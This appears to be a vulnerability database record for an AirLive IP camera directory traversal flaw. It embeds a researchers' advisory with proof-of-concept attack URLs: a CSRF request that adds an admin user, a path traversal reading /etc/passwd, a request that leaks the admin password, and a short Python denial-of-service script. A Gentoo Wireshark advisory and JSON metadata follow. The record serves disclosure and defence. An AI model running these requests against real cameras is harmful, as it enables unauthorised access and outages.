var-201310-0240
Vulnerability from variot
Directory traversal vulnerability in cgi-bin/admin/fileread in AirLive WL2600CAM and possibly other camera models allows remote attackers to read arbitrary files via a .. (dot dot) in the READ.filePath parameter. AirLive WL-2600CAM And other models cgi-bin/admin/fileread Contains a directory traversal vulnerability.By a third party .. Airlive IP Camera is an IP camera device. AirLive WL-2600CAM is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. A remote attacker can exploit this issue to obtain sensitive information that could aid in further attacks. =========================================================================== AIRLIVE ==================================================================== ===========================================================================
1.Advisory Information Title: Airlive Multiple Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013
2.Vulnerability Description Multiple vulnerabilities have been found in this devices: -CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103) -CVE-2013-3541. Relative Path Traversal(CWE-23). -CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264) -CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3691. Denial of Service
3.Affected Products CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. It\x92s possible others models are affected but they were not checked.
4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials.
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
4.2.Relative Path Traversal CVE-2013-3541, Transversal Path that\x92s allow you to read file system configuration.
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
4.3.Sensitive Information Exposure + Privilege Escalation CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
We can decode Admin password (base64). Now we can relogin like admin user and we have made the escalation privilege
4.4.Clear Text Storage of Sensitive Information CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file. You can open with any text editor and look for user's information for example, passwords, users and so on.
4.5.Denial of Service (DoS) Use CVE-2013-3691, DoS by overbuffing path \x91/\x92. A request with a large number of \x91a\x92 can take down the http service from the camera device.
Request: http://xx.xx.xx.xx/[a*3000]
You will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can't Connect
It will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won\x92t recuperate ever itself
The following Python script could be used to test the DoS:
@ request = 'GET /' + \x91A\x92 * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ s.send(request)
@ response = s.recv(1024)
@ s.close()
5.Credits
-CVE-2013-3541 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3691 was discovered by Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo -CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jon\xe1s Ropero Castillo.
6.Report Timeline -2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. -2013-06-03: Students asks for a reply. -2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201308-05
http://security.gentoo.org/
Severity: High Title: Wireshark: Multiple vulnerabilities Date: August 28, 2013 Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694 ID: 201308-05
Synopsis
Multiple vulnerabilities have been found in Wireshark, allowing remote attackers to execute arbitrary code or cause Denial of Service.
Background
Wireshark is a versatile network protocol analyzer.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-analyzer/wireshark < 1.10.1 >= 1.10.1 *>= 1.8.9
Description
Multiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition.
Workaround
There is no known workaround at this time.
Resolution
All Wireshark 1.10 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.10.1"
All Wireshark 1.8 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.8.9"
References
[ 1 ] CVE-2012-0041 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041 [ 2 ] CVE-2012-0042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042 [ 3 ] CVE-2012-0043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043 [ 4 ] CVE-2012-0066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066 [ 5 ] CVE-2012-0067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067 [ 6 ] CVE-2012-0068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068 [ 7 ] CVE-2012-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548 [ 8 ] CVE-2012-4048 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048 [ 9 ] CVE-2012-4049 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049 [ 10 ] CVE-2012-4285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285 [ 11 ] CVE-2012-4286 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286 [ 12 ] CVE-2012-4287 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287 [ 13 ] CVE-2012-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288 [ 14 ] CVE-2012-4289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289 [ 15 ] CVE-2012-4290 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290 [ 16 ] CVE-2012-4291 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291 [ 17 ] CVE-2012-4292 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292 [ 18 ] CVE-2012-4293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293 [ 19 ] CVE-2012-4294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294 [ 20 ] CVE-2012-4295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295 [ 21 ] CVE-2012-4296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296 [ 22 ] CVE-2012-4297 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297 [ 23 ] CVE-2012-4298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298 [ 24 ] CVE-2013-3540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540 [ 25 ] CVE-2013-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541 [ 26 ] CVE-2013-3542 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542 [ 27 ] CVE-2013-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555 [ 28 ] CVE-2013-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556 [ 29 ] CVE-2013-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557 [ 30 ] CVE-2013-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558 [ 31 ] CVE-2013-3559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559 [ 32 ] CVE-2013-4074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074 [ 33 ] CVE-2013-4075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075 [ 34 ] CVE-2013-4076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076 [ 35 ] CVE-2013-4077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077 [ 36 ] CVE-2013-4078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078 [ 37 ] CVE-2013-4079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079 [ 38 ] CVE-2013-4080 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080 [ 39 ] CVE-2013-4081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081 [ 40 ] CVE-2013-4082 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082 [ 41 ] CVE-2013-4083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083 [ 42 ] CVE-2013-4920 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920 [ 43 ] CVE-2013-4921 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921 [ 44 ] CVE-2013-4922 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922 [ 45 ] CVE-2013-4923 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923 [ 46 ] CVE-2013-4924 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924 [ 47 ] CVE-2013-4925 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925 [ 48 ] CVE-2013-4926 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926 [ 49 ] CVE-2013-4927 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927 [ 50 ] CVE-2013-4928 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928 [ 51 ] CVE-2013-4929 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929 [ 52 ] CVE-2013-4930 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930 [ 53 ] CVE-2013-4931 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931 [ 54 ] CVE-2013-4932 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932 [ 55 ] CVE-2013-4933 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933 [ 56 ] CVE-2013-4934 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934 [ 57 ] CVE-2013-4935 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935 [ 58 ] CVE-2013-4936 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201308-05.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201310-0240",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "airlive wl2600cam",
"scope": "eq",
"trust": 1.6,
"vendor": "ovislink",
"version": null
},
{
"model": "wl-2600cam",
"scope": null,
"trust": 0.8,
"vendor": "ovislink",
"version": null
},
{
"model": "wl2600cam",
"scope": null,
"trust": 0.6,
"vendor": "airlive",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
},
{
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:ovislink:airlive_wl2600cam",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Eliezer VaradA Lopez, Javier Repiso Snchez and Jon??s Ropero Castillo",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
}
],
"trust": 0.6
},
"cve": "CVE-2013-3541",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-3541",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-07700",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-3541",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-3541",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2013-07700",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201306-346",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"db": "CNNVD",
"id": "CNNVD-201306-346"
},
{
"db": "NVD",
"id": "CVE-2013-3541"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in cgi-bin/admin/fileread in AirLive WL2600CAM and possibly other camera models allows remote attackers to read arbitrary files via a .. (dot dot) in the READ.filePath parameter. AirLive WL-2600CAM And other models cgi-bin/admin/fileread Contains a directory traversal vulnerability.By a third party .. Airlive IP Camera is an IP camera device. AirLive WL-2600CAM is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. \nA remote attacker can exploit this issue to obtain sensitive information that could aid in further attacks. ===========================================================================\nAIRLIVE\n====================================================================\n===========================================================================\n\n1.Advisory Information\nTitle: Airlive Multiple Vulnerabilities\nDate Published: 12/06/2013\nDate of last updated: 12/06/2013\n\n2.Vulnerability Description\nMultiple vulnerabilities have been found in this devices:\n-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)\n-CVE-2013-3541. Relative Path Traversal(CWE-23). \n-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264)\n-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)\n-CVE-2013-3691. Denial of Service\n\n3.Affected Products\nCVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM\nCVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. \nIt\\x92s possible others models are affected but they were not checked. \n\n4.PoC\n4.1.Cross Site Request Forgery (CSRF)\nCVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. \nThese cameras use a web interface which is prone to CSRF vulnerabilities. \nA malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. \nIn the following example we will make a vector to create an alternative user with administration credentials. \n_____________________________________________________________________________\nhttp://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1\u0026pwd=test1\u0026grp=administrator\u0026sgrp=ptz\u0026action=add\u0026redirect= \n_____________________________________________________________________________\n\n4.2.Relative Path Traversal\nCVE-2013-3541, Transversal Path that\\x92s allow you to read file system configuration. \n_____________________________________________________________________________\nhttp://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd\n_____________________________________________________________________________\n\n4.3.Sensitive Information Exposure + Privilege Escalation\nCVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL\n_____________________________________________________________________________\nhttp://xx.xx.xx.xx/cgi-bin/operator/param?action=list\u0026group=General.UserID\n_____________________________________________________________________________\nWe can decode Admin password (base64). \nNow we can relogin like admin user and we have made the escalation privilege\n\n4.4.Clear Text Storage of Sensitive Information\nCVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file. \nYou can open with any text editor and look for user\u0027s information for example, passwords, users and so on. \n\n4.5.Denial of Service (DoS)\nUse CVE-2013-3691, DoS by overbuffing path \\x91/\\x92. A request with a large number of \\x91a\\x92 can take down the http service from the camera device. \n_____________________________________________________________________________\nRequest: http://xx.xx.xx.xx/[a*3000]\n_____________________________________________________________________________\nYou will get the next message, Conexion has been reset. After remove de adds and refresh it you will get the next message, Can\u0027t Connect\n\nIt will be down for around 2min but if we are doing the request once and again each 1min for example, the camera won\\x92t recuperate ever itself\n\nThe following Python script could be used to test the DoS:\n_____________________________________________________________________________\n @ request = \u0027GET /\u0027 + \\x91A\\x92 * 3000 + \u0027.html HTTP/1.0\\r\\n\u0027\n @ s = socket.socket()\n @ s.connect((cam_ip, 80))\n @ s.send(request)\n @ response = s.recv(1024)\n @ s.close()\n_____________________________________________________________________________\n\n5.Credits\n\n-CVE-2013-3541 was discovered by Eliezer Varad\\xe9 Lopez, Javier Repiso S\\xe1nchez and Jon\\xe1s Ropero Castillo. \n-CVE-2013-3691 was discovered by Javier Repiso S\\xe1nchez and Jon\\xe1s Ropero Castillo\n-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 was discovered by Jon\\xe1s Ropero Castillo. \n\n6.Report Timeline\n-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received. \n-2013-06-03: Students asks for a reply. \n-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201308-05\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Wireshark: Multiple vulnerabilities\n Date: August 28, 2013\n Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694\n ID: 201308-05\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Wireshark, allowing remote\nattackers to execute arbitrary code or cause Denial of Service. \n\nBackground\n==========\n\nWireshark is a versatile network protocol analyzer. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-analyzer/wireshark \u003c 1.10.1 \u003e= 1.10.1\n *\u003e= 1.8.9\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Wireshark. Please\nreview the CVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker could possibly execute arbitrary code with the\nprivileges of the process or cause a Denial of Service condition. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Wireshark 1.10 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/wireshark-1.10.1\"\n\nAll Wireshark 1.8 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/wireshark-1.8.9\"\n\nReferences\n==========\n\n[ 1 ] CVE-2012-0041\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041\n[ 2 ] CVE-2012-0042\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042\n[ 3 ] CVE-2012-0043\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043\n[ 4 ] CVE-2012-0066\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066\n[ 5 ] CVE-2012-0067\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067\n[ 6 ] CVE-2012-0068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068\n[ 7 ] CVE-2012-3548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548\n[ 8 ] CVE-2012-4048\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048\n[ 9 ] CVE-2012-4049\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049\n[ 10 ] CVE-2012-4285\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285\n[ 11 ] CVE-2012-4286\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286\n[ 12 ] CVE-2012-4287\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287\n[ 13 ] CVE-2012-4288\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288\n[ 14 ] CVE-2012-4289\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289\n[ 15 ] CVE-2012-4290\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290\n[ 16 ] CVE-2012-4291\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291\n[ 17 ] CVE-2012-4292\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292\n[ 18 ] CVE-2012-4293\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293\n[ 19 ] CVE-2012-4294\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294\n[ 20 ] CVE-2012-4295\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295\n[ 21 ] CVE-2012-4296\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296\n[ 22 ] CVE-2012-4297\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297\n[ 23 ] CVE-2012-4298\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298\n[ 24 ] CVE-2013-3540\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540\n[ 25 ] CVE-2013-3541\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541\n[ 26 ] CVE-2013-3542\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542\n[ 27 ] CVE-2013-3555\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555\n[ 28 ] CVE-2013-3556\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556\n[ 29 ] CVE-2013-3557\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557\n[ 30 ] CVE-2013-3558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558\n[ 31 ] CVE-2013-3559\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559\n[ 32 ] CVE-2013-4074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074\n[ 33 ] CVE-2013-4075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075\n[ 34 ] CVE-2013-4076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076\n[ 35 ] CVE-2013-4077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077\n[ 36 ] CVE-2013-4078\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078\n[ 37 ] CVE-2013-4079\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079\n[ 38 ] CVE-2013-4080\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080\n[ 39 ] CVE-2013-4081\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081\n[ 40 ] CVE-2013-4082\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082\n[ 41 ] CVE-2013-4083\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083\n[ 42 ] CVE-2013-4920\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920\n[ 43 ] CVE-2013-4921\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921\n[ 44 ] CVE-2013-4922\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922\n[ 45 ] CVE-2013-4923\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923\n[ 46 ] CVE-2013-4924\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924\n[ 47 ] CVE-2013-4925\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925\n[ 48 ] CVE-2013-4926\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926\n[ 49 ] CVE-2013-4927\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927\n[ 50 ] CVE-2013-4928\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928\n[ 51 ] CVE-2013-4929\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929\n[ 52 ] CVE-2013-4930\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930\n[ 53 ] CVE-2013-4931\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931\n[ 54 ] CVE-2013-4932\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932\n[ 55 ] CVE-2013-4933\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933\n[ 56 ] CVE-2013-4934\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934\n[ 57 ] CVE-2013-4935\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935\n[ 58 ] CVE-2013-4936\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201308-05.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2013 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3541"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004511"
},
{
"db": "CNVD",
"id": "CNVD-2013-07700"
},
{
"db": "BID",
"id": "60549"
},
{
"db": "PACKETSTORM",
"id": "122001"
},
{
"db": "PACKETSTORM",
"id": "122983"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
